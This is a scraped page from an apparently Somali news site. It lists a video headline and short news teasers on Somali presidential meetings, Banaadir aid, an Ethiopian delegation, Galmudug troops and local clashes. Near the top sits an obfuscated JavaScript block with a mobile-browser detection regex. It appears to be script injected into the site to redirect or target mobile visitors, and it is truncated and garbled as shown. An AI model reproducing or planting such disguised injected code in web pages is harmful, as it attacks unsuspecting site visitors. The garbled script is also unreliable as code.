Dhageyso: Warka Habeen Ee Idaacadda Shabelle
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Madaxweyne Xasan Sheekh oo la kulmay safiirka dalka Imaaraadka Carabta
MUQDISHO (SMN) - Madaxwaynaha Soomaaliya Xasan Sheekh Maxamud ayaa Villa Soomaaliya ku qaabilay safiirka Dowladda Isu tagga Imaaraadka Carabta Maxamed Axmed Al-Othman.
Kulanka labadda dhinac...
Sawirro: Maamulka gobolka Banaadir oo gargaar ka qeybiyey saddex degmo
MUQDISHO (SMN) - Guddoomiye Kuxigeenka Gobolka Banaadir ee Arrimaha Bulshada iyo Wacyigelinta Basma Caamir Axmed (Jakeeti) ayaa maanta deeq gargaar ah ka qeybisay Degmooyinka...
Sawirro: Wafdi ka socda dowladda Itoobiya oo soo gaaray Muqdisho
MUQDISHO (SMN) - Wafdi uu hoggaaminayo wasiiru dowlaha wasaaradda arrimaha dibadda ee dalka Itoobiya Mogamed Rafie Abaraya ayaa soo gaaray magaalada Muqdisho oo ay...
Sawirro: Guddoomiyaha Golaha Shacabka oo kormeer sameeyey + ujeedka
MUQDISHO (SMN) -Guddoomiyaha Golaha Shacabka Baarlamaanka Federaalka Soomaaliya, mudane Sheekh Aadan Maxamed Nuur (Madoobe) ayaa maanta kormeer indha indheyn ah ku tagay xarunta weyn...
Cabdi Xaashi oo wada-hadal la yeeshay safiirka dalka Qatar + Sawirro
MUQDISHO (SMN) - Guddoomiyaha Aqalka Sare ee BFS Senator Abdi Hashi Abdullahi wuxuu maanta xafiiskiisa ku qaabilay Danjiraha Dowladda Qadar u fadhiya Soomaaliya Danjire...
Sawirro: Galmudug oo soo bandhigtay ciidamo cusub + ujeedka
DHUUSAMAREEB (SMN) - Saraakiil ka tirsan ciidamada xoogga dalka iyo kuwa Daraawiishta Galmudug ayaa tababar u soo xiray ciidamo ka tirsan dadka deegaanka Wasil,...
Iska hor imaad khasaare geystay oo ka dhacay magaalada Muqdisho
MUQDISHO (SMN) - Warar kala duwan ayaa kasoo baxaya iska hor imaad u dhexeeyey ciidamada dowladda iyo rag hubeysan oo xalay ka dhacay xaafadda...
Dad isku qoys ahaa oo lagu dilay dagaal ka dhacay gobolka Sool
BOOCAME (SMN) - Wararka naga soo gaaraya gobolka Sool ayaa sheegaya in saacadihii lasoo dhaafay dagaal u dhexeeyey laba maleeshiyo beeleed uu ka dhacay...
Wararkii ugu dambeeyey xiisadda siyaasadeed ee degmada Baraawe
BARAAWE (SMN) - Waxaa sii xoogeysanaya khilaafka u dhexeeya golaha deegaanka Baraawe iyo maamulka degmadaasi, kaas oo marba marka ka dambeysa cirka isku sii...














